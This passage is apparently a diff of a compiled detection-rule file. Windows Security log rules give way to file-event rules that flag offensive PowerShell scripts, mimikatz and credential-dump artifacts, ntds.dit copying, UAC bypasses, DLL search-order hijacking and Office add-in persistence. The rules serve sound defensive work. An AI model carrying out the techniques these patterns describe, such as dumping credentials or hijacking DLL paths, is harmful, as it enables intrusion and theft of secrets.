ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth 